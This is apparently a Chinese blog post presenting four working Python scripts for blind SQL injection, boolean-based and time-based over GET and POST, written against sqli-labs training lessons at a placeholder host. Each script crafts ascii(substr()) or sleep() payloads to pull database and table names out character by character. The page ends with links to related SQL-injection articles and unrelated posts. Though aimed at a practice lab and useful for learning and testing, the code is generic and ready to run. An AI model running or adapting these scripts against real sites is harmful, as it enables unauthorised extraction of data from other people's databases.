BOOL型GET传参sql盲注

点击查看代码 
import requests

chars =""

for i in range(32,127):

    chars += chr(i)

result = ""

url_template = "http://yourip/sqllabs/Less-8/?id=2' and ascii(substr(({0}),{1},1))>{2} %23"

url_length = "http://yourip/sqllabs/Less-8/?id=2' and length(({0})) >{1} %23"

def get_result_length(payload,value):

    for n in range(1,100):

        url = url_length.format(payload,n)

        response = requests.get(url)

        length = len(response.text)

        if length >value:

            print("·······data length is :" + str(n))

            return  n

def get_db_name(data_length,payload,value):

    for i in range(1,data_length):

        for char in chars:

            url = url_template.format(payload,i,ord(char))

            response = requests.get(url)

            length = len(response.text)

            if length>value:         #根据返回长度的不同来判断字符正确与否

                global result

                result += char

                print("·······data is :"+ result)

                break

#自定义 sql注入语句 payload   分割符 为0

payload = "select group_concat(table_name) from information_schema.tables where table_schema=database() "

# 根据正确访问时错误访问时返回页面文本长度的不同 来设置一个判断值

value = 706

data_length = get_result_length(payload,value)+1

get_db_name(data_length,payload,value)

print(result)

**延时型GET传参sql盲注**

点击查看代码 
import requests

value =""

for i in range(32,127):

    value += chr(i)

data=""

# 需要 不断 手工调整 url 和 url_length 中的 limit 的第一个参数 来获取下一行的数据

url = "http://yourip/sqllabs/Less-9/?id=1' and if((ascii(substr(({0} limit 1,1),{1},1)) = '{2}'),sleep(3),NULL); %23"

url_length="http://yourip/sqllabs/Less-9/?id=1' and if((length(({0} limit 1,1))={1} ),sleep(3),NULL); %23"

def get_length(payload):

    for n in range(1,100):

        url= url_length.format(payload,n)

        #print(url)

        if(get_respone(url)):

            print("[+] length is {0}".format(n))

            return n

def get_data(payload,value,length):

    for n in range(1,length):

        for v in value :

            url_data = url.format(payload,n,ord(v)) #ord()返回字符的ASCII码

            #print(url_data)

            if(get_respone(url_data)):

                global data

                data=data+v

                print("[+] data is {0}".format(data))

                break

def get_respone(url):

    try:

        html = requests.get(url,timeout=2)

        return False

    except Exception as e:

        print("......")

        return True

#可以更改payload 来获取需要的数据

databse_payload ="select database()"

get_data(databse_payload,value,get_length(databse_payload)+1)

**BOOL型POST传参sql盲注**

点击查看代码 
import requests

chars =""

for i in range(32,127):

    chars += chr(i)

result = ""

def get_length(value):  #获取要查询的数据的长度

    for n in range(1,100):

        payload = "admin' and length(({0})) ={1} #".format(data_payload,n)

        data = {"uname":payload,"passwd":"admin"}

        html = requests.post(url,data=data)

        length = len(html.text)

        if length >value:

            print("……data length is :" + str(n))

            return  n

def get_data(data_length,value): #获取数据

    global result

    for i in range(1,data_length):

        for char in chars:

            payload = "admin'and ascii(substr(({0}),{1},1))={2} #".format(data_payload,i,ord(char))

            data = {"uname":payload,"passwd":"admin"}

            html = requests.post(url,data=data)

            length = len(html.text)

            if length>value:         #根据返回长度的不同来判断字符正确与否

                result += char

                print("…… data is :"+ result)

                break

url = "http://yourip/sqllabs/Less-15/"

data_payload = "select group_concat(table_name)from information_schema.tables where table_schema = database()"

value = 1460     # 根据正确访问和错误访问时返回页面文本长度的不同 来设置一个判断值,这个值需要在浏览器中 按f12 查看

length = get_length(value) +1

get_data(length,value)

print(result)

**延时型POST传参sql盲注**

点击查看代码 


import requests

import time

value =""

for i in range(32,127):

    value += chr(i)

result=""

def get_length():#获取数据的长度

    for n in range(1, 100):

        payload = "admin' and if((length(({0} ))={1}),sleep(2),1) #".format(data_payload, n)

        data = {"uname": payload, "passwd": "admin", "submit": "submit"}

        start_time = time.time()

        html = requests.post(url, data=data)

        end_time = time.time()

        use_time = end_time - start_time #求出请求前后的时间差来判断是否延时了

        if use_time > 2:

            print("...... data's length is :"+ str(n))

            return n

def get_data(length):#获取数据

    global result

    for n in range(1,length):

        for v in value :

            payload = "admin' and if((ascii(substr(({0} ),{1},1)) = '{2}'),sleep(2),1) #".format(data_payload,n,ord(v))

            data = {"uname":payload,"passwd":"admin","submit":"submit"}

            start_time = time.time()

            requests.post(url,data=data)

            end_time = time.time()

            use_time = end_time - start_time

            if use_time >2:

                result += v

                print("......"+result)

url = "http://yourip/sqllabs/Less-11/"

data_payload ="select database()"

length = get_length() + 1   #注意这里要长度加 1 因为 range(1,10)的范围是 1<= x <10

get_data(length)

print(".....data is :"+ result)

几种SQL盲注的脚本的更多相关文章

  1. metinfo小于v6.2.0版本SQL盲注利用脚本

    #coding=utf-8 import requests import re import sys import time #获取config_safe.php中的 key def getKey(u ...

  2. DVWA-SQL Injection (Bind) SQL盲注

    盲注同于union select查询注入,盲注只能得到数据库回显的正确和错误,利用返回的正确和错误一个一个判断. LOW 审计源码 <?php if( isset( $_GET[ 'Submit ...

  3. SQL盲注攻击的简单介绍

    1 简介     1.1 普通SQL注入技术概述     目前没有对SQL注入技术的标准定义,微软中国技术中心从2个方面进行了描述[1]:     (1) 脚本注入式的攻击     (2) 恶意用户输 ...

  4. Web系统常见安全漏洞及解决方案-SQL盲注

    关于web安全测试,目前主要有以下几种攻击方法: 1.XSS 2.SQL注入 3.跨目录访问 4.缓冲区溢出 5.cookies修改 6.Htth方法篡改(包括隐藏字段修改和参数修改) 7.CSRF ...

  5. (转)SQL盲注攻击的简单介绍

    转:http://hi.baidu.com/duwang1104/item/65a6603056aee780c3cf2968 1 简介     1.1 普通SQL注入技术概述     目前没有对SQL ...

  6. Bugku-CTF之login3(SKCTF)(基于布尔的SQL盲注)

    Day41 login3(SKCTF)

  7. WEB安全实战(一)SQL盲注

    前言 好长时间没有写过东西了,不是不想写,仅仅只是是一直静不下心来写点东西.当然,拖了这么长的时间,也总该写点什么的.近期刚刚上手安全方面的东西,作为一个菜鸟,也本着学习的目的,就谈谈近期接触到的安全 ...

  8. WEB安全番外第四篇--关于SQL盲注

    一.SQL盲注: 看不到回显的,无法从返回直接读取到数据库内容的对数据的猜解,属于盲注. 二.第一种--基于布尔类型的盲注: 这种很简单,最典型的例子,就是挖SQL注入的时候常用的: ''' http ...

  9. SQL盲注

    一.首先输入1和-1 查看输入正确和不正确两种情况 二.三种注入POC LOW等级 ... where user_id =$id 输入      真  and  假 = 假 (1)...where u ...

  10. 第九届极客大挑战——Geek Chatroom(sql盲注)

    首先观察这个web应用的功能,可以任意留言,也可以搜索留言,当然我还用cansina扫描过网站,查看过源码,抓包查看过header等.没发现其他提示的情况下断定这就是个sql注入,可能存在的注入点呢, ...

随机推荐

  1. P5192 有源汇上下界最大流总结

    之前听学长讲解时,只听了大体思路就跑路了,没有听到具体细节.后面在考虑出度多的点具体向虚拟源点连边还是虚拟汇点连边时,只凭直觉直接向源点连边,然后就一直WA,直到后来中午听同学讲解才反应过来,白白浪费 ...

  2. ArcEngine创建注记类及生成注记要素

    在宗地出图的时候遇到此功能要求,看代码 ※创建注记类 public void createBlackAnno(IMap pMap) { //创建mdb数据库文件 IWorkspaceFactory p ...

  3. 火狐浏览器调试eval源码

    火狐浏览器调试eval源码 firefox浏览器在网页调试上,有一个没法和chrome一比高下的功能,就是eval脚本的调试,有时前端架构使用了基于eval的方式,有时候可能是自己一个多行函数,每每遇 ...

  4. CentOS7更改阿里源

    阿里云yum源:1)备份当前yum源防止出现意外还可以还原回来cd /etc/yum.repos.d/cp /CentOS-Base.repo /CentOS-Base-repo.bak2)使用wge ...

  5. Tcp网络模型

    要摸清网络,那么第一步肯定是要清楚网络协议的分层结构,用上帝视角来看网络. 对于同一台设备上的进程间通信,有很多种方式,比如有管道.消息队列.共享内存.信号等方式,而对于不同设备上的进程间通信,就需要 ...

  6. windows10环境下的RabbitMQ安装步骤(图文)(转载)

    第一步:下载并安装erlang 原因:RabbitMQ服务端代码是使用并发式语言Erlang编写的,安装Rabbit MQ的前提是安装Erlang. 下载地址:http://www.erlang.or ...

  7. 记一个jdbc创建数据库、用户操作时,创建新用户提示CREATE USER权限问题

    手写存储表数据库信息,访问链接动态数据源操作: mysql: 1.root登录服务器 进入数据库 mysql -u root -p2.创建数据库 create database shop; shop ...

  8. Redis内存淘汰策略

    目录 一.内存淘汰策略重要性 二.Key值过期策略 三.内存淘汰策略 三.Redis内存淘汰策略配置 一.内存淘汰策略重要性 我们都知道redis的性能很高,最主要的原因之一就是redis的数据都在内 ...

  9. MyBatis详细代码来啦!

    家人们,改代码改到现在真的绝了,终于是改出来了,但是对于某些判断性的小问题还没写,细节性满满的增删改查终于实现啦! 目录结构 各个文件的代码: //SqlSessionFactoryUtils.jav ...

  10. 灵感宝盒新增「线上云展会」产品,「直播观赏联动」等你共建丨RTE NG-Lab 双周报

    前言 哈喽各位开发者,「RTE NG-Lab 双周报」如期而至! 近两周,我们更新了一些新的实时互动场景和产品,也举办了代码实验室的第一次线下活动,与大家一起体验了声网最新的 4.0 SDK. 灵感宝 ...